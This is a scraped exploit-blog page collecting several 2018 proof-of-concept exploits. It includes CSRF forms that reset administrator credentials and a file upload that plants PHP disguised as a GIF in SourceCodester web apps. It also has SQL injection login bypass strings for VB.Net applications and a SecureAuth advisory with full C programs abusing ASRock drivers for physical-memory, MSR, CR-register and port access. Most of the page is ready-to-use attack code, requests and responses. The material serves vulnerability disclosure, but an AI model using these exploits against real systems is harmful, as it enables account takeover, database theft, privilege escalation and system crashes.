# Exploit Title: School Attendance Monitoring System 1.0 - Cross-Site Request Forgery (Update Admin)
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18797
# POC:
# 1)
# .../[PATH]/user/user/edit.php
#02 if (!isset($_SESSION['ACCOUNT_ID'])){
#03 redirect(web_root."index.php");
#04 }
#05
#06 @$USERID = $_GET['id'];
#07 if($USERID==''){
#08 redirect("index.php");
#09 }
#10 $user = New User();
#11 $singleuser = $user->single_user($USERID);
# .../[PATH]/user/controller.php
#80 $user = New User();
#81 $user->ACCOUNT_NAME = $_POST['U_NAME'];
#82 $user->ACCOUNT_USERNAME = $_POST['U_USERNAME'];
#83 $user->ACCOUNT_PASSWORD =sha1($_POST['U_PASS']);
#84 $user->ACCOUNT_TYPE = $_POST['U_ROLE'];
#85 $user->update($_POST['USERID']);
#86
#87 message("[". $_POST['U_NAME'] ."] has been updated!", "success");
#88 redirect("index.php");
# ...
<html>
<body>
<form action="http://localhost/[PATH]/user/controller.php?action=edit" method="POST">
<input id="USERID" name="USERID" placeholder="Account Id" type="Hidden" value="1">
<input name="U_NAME" placeholder="Account Name" type="text" value="admin">
<input name="deptid" type="hidden" value="">
<input name="U_USERNAME" placeholder="Username" type="text" value="admin">
<input name="deptid" type="hidden" value="">
<input name="U_PASS" placeholder="Account Password" type="Password" value="">
<input name="deptid" type="hidden" value="">
<input id="RU_PASS" name="RU_PASS" placeholder="Re-type Password" type="Password" value="">
<select name="U_ROLE" id="U_ROLE">
<option value="Administrator">Administrator</option>
<option value="SSG">SSG</option>
</select>
<button id="save" name="save" type="submit">Save</button>
</body>
</html>
POST /[PATH]/user/controller.php?action=edit HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 136
USERID=1&U_NAME=admin_test&deptid=&U_USERNAME=admin_test&deptid=&U_PASS=admin_test&deptid=&RU_PASS=admin_test&U_ROLE=Administrator&save=
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 17:57:48 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 128
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
/* `exploitdb`.`useraccounts` */
$useraccounts = array(
array('ACCOUNT_ID' => '1','ACCOUNT_NAME' => 'admin_test','ACCOUNT_USERNAME' => 'admin_test','ACCOUNT_PASSWORD' => '3f72bcb53fb301af20d78d152456d901c30a43b3','ACCOUNT_TYPE' => 'Administrator','EMPID' => '1234','USERIMAGE' => 'photos/import2.png')
);
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863108755
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: School Event Management System 1.0 - Cross-Site Request Forgery (Update Admin)
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_1.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18794
# POC:
# 1)
# .../[PATH]user/user/edit.php
#02 if (!isset($_SESSION['ACCOUNT_ID'])){
#03 redirect(web_root."index.php");
#04 }
#05
#06 @$USERID = $_GET['id'];
#07 if($USERID==''){
#08 redirect("index.php");
#09 }
#10 $user = New User();
#11 $singleuser = $user->single_user($USERID);
# .../[PATH]user/controller.php
#80 $user = New User();
#81 $user->ACCOUNT_NAME = $_POST['U_NAME'];
#82 $user->ACCOUNT_USERNAME = $_POST['U_USERNAME'];
#83 $user->ACCOUNT_PASSWORD =sha1($_POST['U_PASS']);
#84 $user->ACCOUNT_TYPE = $_POST['U_ROLE'];
#85 $user->update($_POST['USERID']);
#86
#87 message("[". $_POST['U_NAME'] ."] has been updated!", "success");
#88 redirect("index.php");
# ...
<html>
<body>
<form action="http://localhost/[PATH]/user/controller.php?action=edit" method="POST">
<input id="USERID" name="USERID" placeholder="Account Id" type="Hidden" value="1">
<input name="U_NAME" placeholder="Account Name" type="text" value="admin">
<input name="deptid" type="hidden" value="">
<input name="U_USERNAME" placeholder="Username" type="text" value="admin">
<input name="deptid" type="hidden" value="">
<input name="U_PASS" placeholder="Account Password" type="Password" value="">
<input name="deptid" type="hidden" value="">
<input id="RU_PASS" name="RU_PASS" placeholder="Re-type Password" type="Password" value="">
<select name="U_ROLE" id="U_ROLE">
<option value="Administrator">Administrator</option>
<option value="SSG">SSG</option>
</select>
<button id="save" name="save" type="submit">Save</button>
</body>
</html>
POST /[PATH]/user/controller.php?action=edit HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 136
USERID=1&U_NAME=admin_test&deptid=&U_USERNAME=admin_test&deptid=&U_PASS=admin_test&deptid=&RU_PASS=admin_test&U_ROLE=Administrator&save=
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 17:57:48 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 128
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
/* `exploitdb`.`useraccounts` */
$useraccounts = array(
array('ACCOUNT_ID' => '1','ACCOUNT_NAME' => 'admin_test','ACCOUNT_USERNAME' => 'admin_test','ACCOUNT_PASSWORD' => '3f72bcb53fb301af20d78d152456d901c30a43b3','ACCOUNT_TYPE' => 'Administrator','EMPID' => '1234','USERIMAGE' => 'photos/import2.png')
);
# Exploit Title: School Event Management System 1.0 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_1.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18793
# POC:
# 1)
# http://localhost/[PATH]/event/controller.php?action=photos
#
GIFefe
<?php
.....
?>
# http://localhost/[PATH]/event/photo/[FILE]
#
#[PATH]/event/controller.php
#....
#29 function doInsert(){
#30 if(isset($_POST['save'])){
#31
#32
#33 $errofile = $_FILES['image']['error'];
#34 $type = $_FILES['image']['type'];
#35 $temp = $_FILES['image']['tmp_name'];
#36 $myfile =$_FILES['image']['name'];
#37 $location="photo/".$myfile;
#38
#39 @$file=$_FILES['image']['tmp_name'];
#40 @$image= addslashes(file_get_contents($_FILES['image']['tmp_name']));
#41 @$image_name= addslashes($_FILES['image']['name']);
#42 @$image_size= getimagesize($_FILES['image']['tmp_name']);
#....
GET /[PATH]/event/controller.php?action=photos HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
Content-Type: multipart/form-data; boundary=
---------------------------3634372676911755021110261466
Content-Length: 617
-----------------------------3634372676911755021110261466
Content-Disposition: form-data; name="EventID"
1
-----------------------------3634372676911755021110261466
Content-Disposition: form-data; name="MAX_FILE_SIZE"
1000000
-----------------------------3634372676911755021110261466
Content-Disposition: form-data; name="photo"; filename="phpinfo_gif.php"
Content-Type: application/force-download
GIFefe
<?php
phpinfo();
?>
-----------------------------3634372676911755021110261466
Content-Disposition: form-data; name="savephoto"
-----------------------------3634372676911755021110261466--
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 17:27:54 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 143
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
<html>
<body>
<form action="http://localhost/[PATH]/event/controller.php?action=photos" enctype="multipart/form-data" method="post">
<input name="EventID" id="EventID" value="1" type="hidden">
<input name="MAX_FILE_SIZE" value="1000000" type="hidden">
<input id="photo" name="photo" type="file">
<button name="savephoto" type="submit">Upload Photo</button>
</form>
</body>
</html>
# Exploit Title: Point of Sales (POS) in VB.Net MySQL Database 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/poinofsales_0.zip
# Version: 1.0
# Category: Windows
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18805
# POC:
# 1)
# User: '||(SEleCT 'Efe' FRoM DuaL WheRE 113=113 AnD (SEleCT 64 FRom(SELeCT CoUNT(*),ConCAT(ConCAT(0x203a20,UsER(),DAtABAsE(),VErSIoN()),(SelEcT (ELT(64=64,1))),FLooR(RAnD(0)*2))x FrOM INFOrMATIoN_SchEMA.pLUGINS GroUP By x)a))||'
# Pass: Null
#
# https://2.bp.blogspot.com/-qlfhS-GUaCQ/W9Yt3aHdLHI/AAAAAAAAENg/Hmxj2lZ62cYITPlTNaNrwwAgh379Cbi8ACLcBGAs/s1600/sql3.png
#
#[PATH]/LoginForm1.vb
#....
#11 Private Sub OK_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles OK.Click
#12 sql = "SELECT * FROM `tblemployee` WHERE `USERNAME` ='" & UsernameTextBox.Text & "' and `PASSWRD` = sha1('" & PasswordTextBox.Text & "')"
#13 janobefindthis(sql)
#14
#15 If GetNumRows() = 1 Then
#16 LoadSingleResult("login")
#17 ' MsgBox(fullname)
#18 Form1.statsloginname.Text = fullname
#19 Form1.tsLogin.Text = "Logout"
#20
#21 If usertype = "Administrator" Then
#22 Visible_Admin(True)
#23 Else
#24 Visible_Cashier(True)
#25 End If
#26 Else
#27 MsgBox("Username or Password not registered!")
#28 End If
#29
#30
#31 Me.Close()
#32 End Sub
#....
# Exploit Title: Curriculum Evaluation System 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/curriculumevaluationsystem_0.zip
# Version: 1.0
# Category: Windows
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18803
# POC:
# 1)
# User: 'or 1=1 or ''='
# ' AnD EXTRAcTVaLUE(22,CoNCaT(0x5c,veRSion(),(SElECT (ElT(1=1,1))),database()))-- Efe
# POC:
# 2)
# User: 'or 1=1 or ''='
# Pass: Null
#
# https://2.bp.blogspot.com/-4O0oZTFkzJE/W9Y4HWcImQI/AAAAAAAAEN4/5P-n-9H6JAQMiN6UpJu340xI4x_-MSjHACLcBGAs/s1600/sql5.png
#[PATH]/frmCourse.vb
#....
#47 Private Sub txtSearch_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged
#48 sql = "Select * From tblcourse WHERE Course Like '%" & txtSearch.Text & "%'"
#49 reloadDtg(sql, dtglist)
#50 End Sub
#....
#[PATH]/includes/user.vb
#....
#05 Public Sub login(ByVal username As Object, ByVal pass As Object)
#06 Try
#07
#08 con.Open()
#09 reloadtxt("SELECT * FROM `tbluseraccount` WHERE User_name= '" & username & "' and Pass = sha1('" & pass & "')")
#10
#11
#12 If dt.Rows.Count > 0 Then
#13 If dt.Rows(0).Item("UserType") = "Administrator" Then
#14 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
#15 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
#16 With Form1
#17 .tsAddG.Enabled = True
#18 .tsStudent.Enabled = True
#19 .tsCurriculum.Enabled = True
#20 .tsGrades.Enabled = True
#21 .tsReport.Enabled = True
#22 .tsUtilities.Enabled = True
#23 .tsSearchStudent.Enabled = True
#24 .tsLogin.Image = My.Resources.logout
#25 .tsLogin.Text = "Logout"
#26 End With
#27
#28
#29 LoginForm1.Close()
#30
#31
#32 ElseIf dt.Rows(0).Item("UserType") = "Faculty" Then
#33
#34 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
#35 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
#36 With Form1
#37 .tsAddG.Enabled = True
#38 .tsStudent.Enabled = True
#39 .tsCurriculum.Enabled = True
#40 .tsGrades.Enabled = True
#41 .tsReport.Enabled = True
#42 .tsSearchStudent.Enabled = True
#43 .tsLogin.Image = My.Resources.logout
#44 .tsLogin.Text = "Logout"
#45 End With
#46
#47
#48
#49
#50 LoginForm1.Close()
#51
#52
#53
#54 ElseIf dt.Rows(0).Item("UserType") = "Assistant" Then
#55 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
#56 'With Form1
#57 With Form1
#58 .tsAddG.Enabled = True
#59 .tsStudent.Enabled = True
#60 .tsCurriculum.Enabled = True
#61 .tsGrades.Enabled = True
#62 .tsReport.Enabled = True
#63
#64 .tsSearchStudent.Enabled = True
#65 .tsLogin.Image = My.Resources.logout
#66 .tsLogin.Text = "Logout"
#67 End With
#68
#69
#70 LoginForm1.Close()
#71 End If
#72
#73 'Form1.UserIdToolStripStatus.Text = dt.Rows(0).Item("UserId")
#74 'Form1.UserToolStripStatus.Text = dt.Rows(0).Item("Fullname")
#75 'Form1.StatusStrip1.Visible = True
#76 'inserting logs
#77 'sql = "INSERT INTO `tbllogs` (`UserId`, `LogDate`,LogMode) " & _
#78 ' " VALUES ('" & dt.Rows(0).Item("UserId") & "',Now(),'Logged in')"
#79 'create(sql)
#80
#81 Else
#82 MsgBox("Acount doest not exist!", MsgBoxStyle.Information)
#83 End If
#84 Catch ex As Exception
#85 MsgBox(ex.Message)
#86 End Try
#87 con.Close()
#88 da.Dispose()
#89 End Sub
#....
# Exploit Title: Aplaya Beach Resort Online Reservation System 1.0 - Multiple Vulnerabilities
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/aplaya.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/admin/mod_users/controller.php?action=edit
#
POST /[PATH]/admin/mod_users/controller.php?action=edit HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
account_id=5&name=Janno%2BPalacios&deptid=&username=efe%40omerefe.com&deptid=&pass=efe&type=Administrator&save=
HTTP/1.1 200 OK
Date: Mon, 29 Oct 2018 08:20:21 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=7v7av68r870gj66ouhf1sk3260; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 57
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/admin/mod_room/controller.php?action=editimage
#
<html>
<body>
<form action="http://localhost/[PATH]/admin/mod_room/controller.php?action=editimage" enctype="multipart/form-data" method="POST">
<input id="image" name="image" type="file"></td>
<button name="save" type="submit">Save</button>
</form>
</body>
</html>
# POC:
# 3)
# http://localhost/[PATH]/admin/mod_room/index.php?view=view&id=[SQL]
#
#....
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/
ASRock Drivers Elevation of Privilege Vulnerabilities
1. *Advisory Information*
Title: ASRock Drivers Elevation of Privilege Vulnerabilities
Advisory ID: CORE-2018-0005
Advisory URL: https://www.secureauth.com/labs/advisories/asrock-drivers-elevation-privilege-vulnerabilities
Date published: 2018-10-25
Date of last update: 2018-10-25
Vendors contacted: ASRock
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed
IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with
Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient
Access Control [CWE-782]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2018-10709, CVE-2018-10710, CVE-2018-10711, CVE-2018-10712
3. *Vulnerability Description*
ASRock's website states that [1]:
ASRock Inc. is established in 2002, specialized in the field of
motherboards. With the 3C design concept, Creativity, Consideration,
Cost-effectiveness, the company explores the limit of motherboards
manufacturing while paying attention on the eco issue at the same
time, developing products with the consideration of eco-friendly
concept. ASRock has been growing fast and become world third largest
motherboard brand with headquarter in Taipei, Taiwan and branches in
Europe and the USA.
ASRock offers several utilities designed to give the user with an ASRock
motherboard more control over certain settings and functions.
These utilities include various features like the RGB LED control,
hardware monitor, fan controls, and overclocking/voltage options.
Multiple vulnerabilities were found in AsrDrv101.sys and AsrDrv102.sys
low level drivers, installed by ASRock RGBLED and other ASRock branded
utilities, which could allow a local attacker to elevate privileges.
4. *Vulnerable Packages*
. ASRock RGBLED before v1.0.35.1
. A-Tuning before v3.0.210
. F-Stream before v3.0.210
. RestartToUEFI before v1.0.6.2
5. *Vendor Information, Solutions and Workarounds*
ASRock published the following fixed applications for each of its
motherboards models:
. ASRock RGBLED v1.0.36
. A-Tuning v3.0.216
. F-Stream v3.0.216
. RestartToUEFI v1.0.7
Downloads are available on the ASRock website.
6. *Credits*
These vulnerabilities were discovered and researched by Diego Juarez.
The publication of this advisory was coordinated by Leandro Cuozzo
from SecureAuth Advisories Team.
7. *Technical Description / Proof of Concept Code*
ASRock's RBGLED, A-Tuning, F-Stream, RestartToUEFI, and possibly others,
use a low level driver to program and query the status on embedded ICs
on their hardware. Fan curves, clock frequencies, LED colors, thermal
performance, and other user customizable properties and monitoring
functionality are exposed to applications through this low level kernel
driver.
The main subjects of this advisory are the device drivers
installed/loaded by these utilities (AsrDrv101.sys and ArsDrv102.sys).
>From now on addressed as "AsrDrv". Default installation allows
non-privileged user processes (even running at LOW INTEGRITY) to get a
HANDLE and issue IOCTL codes to the driver.
The following sections describe the problems found.
7.1. *CR register access*
[CVE-2018-10709]
AsrDrv exposes functionality to read and write CR register values. This
could be leveraged in a number of ways to ultimately run code with
elevated privileges.
/-----
// Asrock RGBLED PoC demonstrating non-privileged access to CR registers
#include <windows.h>
#include <stdio.h>
#define IOCTL_ASROCK_READCR 0x22286C
#define IOCTL_ASROCK_WRITECR 0x222870
HANDLE ghDriver = 0;
#pragma pack (push,1)
typedef struct _ASROCK_CR_STRUCT {
ULONG64 reg;
ULONG64 value;
} ASROCK_CR_STRUCT;
#pragma pack(pop)
#define IOCTLMACRO(iocontrolcode, size) \
ULONG64 outbuffer[2] = { 0 }; \
DWORD returned = 0; \
DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \
return outbuffer[1]; \
ULONG64 ASROCK_ReadCR(DWORD reg)
{
ASROCK_CR_STRUCT inbuffer = { 3, 0};
IOCTLMACRO(IOCTL_ASROCK_READCR, 10)
}
ULONG64 ASROCK_WriteCR(DWORD reg, ULONG64 value)
{
ASROCK_CR_STRUCT inbuffer = { reg, value};
IOCTLMACRO(IOCTL_ASROCK_WRITECR, 10)
}
BOOL InitDriver()
{
char szDeviceName[] = "\\\\.\\AsrDrv101";
ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (ghDriver == INVALID_HANDLE_VALUE) {
printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
return FALSE;
}
return TRUE;
}
int main(int argc, char* argv[])
{
printf("Asrock RGBLED PoC (CR access) - pnx!/CORE\n");
if (!InitDriver()) {
printf("InitDriver failed! - aborting...\n");
exit(0);
}
ULONG64 a = ASROCK_ReadCR(3);
printf("CR3 (PageDir): %llx\n", a);
printf("press ENTER for instant system CRASH\n");
getchar();
a = ASROCK_WriteCR(3, 0xffff1111ffff2222);
CloseHandle(ghDriver);
}
-----/
7.2. *Arbitrary physical memory read/write*
[CVE-2018-10710]
AsrDrv's IOCTL code 0x22280C exposes a functionality to read and write
arbitrary physical memory, this could be leveraged by a local attacker
to elevate privileges.
Proof of Concept:
/-----
// Asrock RGBLED PoC (arbitrary physical memory write)
// This PoC demonstrates arbitrary write to physical memory.
#include <windows.h>
#include <stdio.h>
#define IOCTL_ASROCK_WRITEPH 0x22280C
HANDLE ghDriver = 0;
#pragma pack (push,1)
typedef struct _ASROCK_PH_STRUCT {
ULONG64 destPhysical;
DWORD size;
DWORD unk0;
ULONG64 src;
} ASROCK_PH_STRUCT;
#pragma pack(pop)
BOOL ASROCK_ph_memcpy(ULONG64 dest, ULONG64 src, DWORD size)
{
ASROCK_PH_STRUCT mystructIn = { dest, size, 0, src};
BYTE outbuffer[0x30] = { 0 };
DWORD returned = 0;
DeviceIoControl(ghDriver, IOCTL_ASROCK_WRITEPH, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);
if (returned) {
return TRUE;
}
return FALSE;
}
BOOL InitDriver()
{
char szDeviceName[] = "\\\\.\\AsrDrv101";
ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (ghDriver == INVALID_HANDLE_VALUE) {
printf("Cannot get handle to driver \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
return FALSE;
}
return TRUE;
}
int main(int argc, char * argv[])
{
printf("Asrock RGBLED PoC (arbitrary physical memory write) - pnx!/CORE\n");
if (!InitDriver()) {
exit(0);
}
printf("press ENTER for SYSTEM CRASH\n");
getchar();
ULONG64 data = 0xFFFF1111FFFF2222;
for (unsigned int i = 0; i < 0xffffffff; i += 0x1000) {
printf(".");
ASROCK_ph_memcpy(i, (ULONG64)&data, 8);
}
CloseHandle(ghDriver);
return 0;
}
-----/
7.3. *MSR Register access*
[CVE-2018-10711]
AsrDrv exposes functionality to read and write Machine Specific
Registers (MSRs). This could be leveraged to execute arbitrary ring-0
code.
Proof of Concept:
/-----
// Asrock RGBLED PoC demonstrating non-privileged access to MSR registers
// This PoC demonstrates non privileged MSR access by reading
// IA32_LSTAR value (leaks a kernel function pointer bypassing KASLR)
// and then writing garbage to it (instant BSOD!)
#include <windows.h>
#include <stdio.h>
#define IOCTL_ASROCK_RDMSR 0x222848
#define IOCTL_ASROCK_WRMSR 0x22284C
HANDLE ghDriver = 0;
#pragma pack (push,1)
typedef struct _ASROCK_MSRIO_STRUCT {
ULONG64 valLO; //
DWORD reg; //
ULONG64 valHI; //
} ASROCK_MSRIO_STRUCT;
#pragma pack(pop)
#define IOCTLMACRO(iocontrolcode, size) \
ASROCK_MSRIO_STRUCT outbuffer = { 0 };\
DWORD returned = 0; \
DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)&outbuffer, sizeof(outbuffer), &returned, NULL); \
return (outbuffer.valHI<<0x20 | outbuffer.valLO); \
ULONG64 GIO_RDMSR(DWORD reg)
{
ASROCK_MSRIO_STRUCT inbuffer = { 0, reg };
IOCTLMACRO(IOCTL_ASROCK_RDMSR, 20)
}
ULONG64 GIO_WRMSR(DWORD reg, ULONG64 value)
{
ASROCK_MSRIO_STRUCT inbuffer = { value & 0xffffffff, reg, (value & 0xffffffff00000000)>>0x20 };
IOCTLMACRO(IOCTL_ASROCK_WRMSR, 20)
}
BOOL InitDriver()
{
char szDeviceName[] = "\\\\.\\AsrDrv101";
ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (ghDriver == INVALID_HANDLE_VALUE) {
printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
return FALSE;
}
return TRUE;
}
int main(int argc, char * argv[])
{
printf("Asrock RGBLED PoC (MSR access) - pnx!/CORE\n");
if (!InitDriver()) {
printf("InitDriver failed! - aborting...\n");
exit(0);
}
ULONG64 a = GIO_RDMSR(0xC0000082);
printf("IA322_LSTAR: %llx (nt!KiSystemCall64)\n", a);
printf("press ENTER for instant BSOD\n");
getchar();
a = GIO_WRMSR(0xC0000082, 0xffff1111ffff2222);
return (int)CloseHandle(ghDriver);
}
-----/
7.4. *Port mapped I/O access*
[CVE-2018-10712]
AsrDrv exposes functionality to read/write data from/to IO ports. This
could be leveraged in a number of ways to ultimately run code with
elevated privileges.
/-----
// Asrock RGBLED PoC demonstrating non-privileged access to IO ports
#include <windows.h>
#include <stdio.h>
#define IOCTL_ASROCK_PORTREADB 0x222810
#define IOCTL_ASROCK_PORTWRITEB 0x222814
HANDLE ghDriver = 0;
#pragma pack (push,1)
typedef struct _ASROCK_CR_STRUCT {
DWORD port;
ULONG64 value;
} ASROCK_CR_STRUCT;
#pragma pack(pop)
#define IOCTLMACRO(iocontrolcode, size) \
BYTE outbuffer[0x10] = { 0 }; \
DWORD returned = 0; \
DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \
return outbuffer[1]; \
BYTE ASROCK_ReadPortB(DWORD port)
{
ASROCK_CR_STRUCT inbuffer = { port, 0};
IOCTLMACRO(IOCTL_ASROCK_PORTREADB, 10)
}
BYTE ASROCK_WritePortB(DWORD port, ULONG64 value)
{
ASROCK_CR_STRUCT inbuffer = { port, value};
IOCTLMACRO(IOCTL_ASROCK_PORTWRITEB, 10)
}
void Reboot()
{
BYTE cf9 = ASROCK_ReadPortB(0xcf9) & ~0x6;
ASROCK_WritePortB(0xcf9, cf9 | 2);
Sleep(50);
ASROCK_WritePortB(0xcf9, cf9 | 0xe);
Sleep(50);
}
BOOL InitDriver()
{
char szDeviceName[] = "\\\\.\\AsrDrv101";
ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (ghDriver == INVALID_HANDLE_VALUE) {
printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
return FALSE;
}
return TRUE;
}
int main(int argc, char * argv[])
{
printf("Asrock RGBLED PoC (PMIO access) - pnx!/CORE\n");
if (!InitDriver()) {
printf("InitDriver failed! - aborting...\n");
exit(0);
}
Reboot();
return (int)CloseHandle(ghDriver);
}
-----/
8. *Report Timeline*
2018-03-12: SecureAuth sent an initial notification to ASRock America
Support.
2018-03-13: ASRock confirmed the receipt and requested additional
information in order to send it to its HQ.
2018-03-13: SecureAuth answered saying that a draft advisory has been
written, including a technical description, and requested for PGP keys
in order to send it encrypted.
2018-03-14: ASRock answered asking for the advisory in clear text.
2018-03-14: SecureAuth sent the draft advisory to ASRock in clear text
form.
2018-03-14: ASRock confirmed the receipt and informed they would submit
it to the HQ for validation.
2018-03-23: SecureAuth requested a status update on the case.
2018-03-23: ASRock answered saying they didn't have a reply from HQ.
2018-03-26: ASRock notified SecureAuth they were still checking the
reported vulnerabilities and requested additional time.
2018-03-27: SecureAuth thanked the status update and informed ASRock
that would be in contact the following week.
2018-03-28: ASRock informed SecureAuth they checked the reported
vulnerabilities and they would have a preliminary schedule for the fix
at the end of April.
2018-03-28: SecureAuth thanked ASRock's reply.
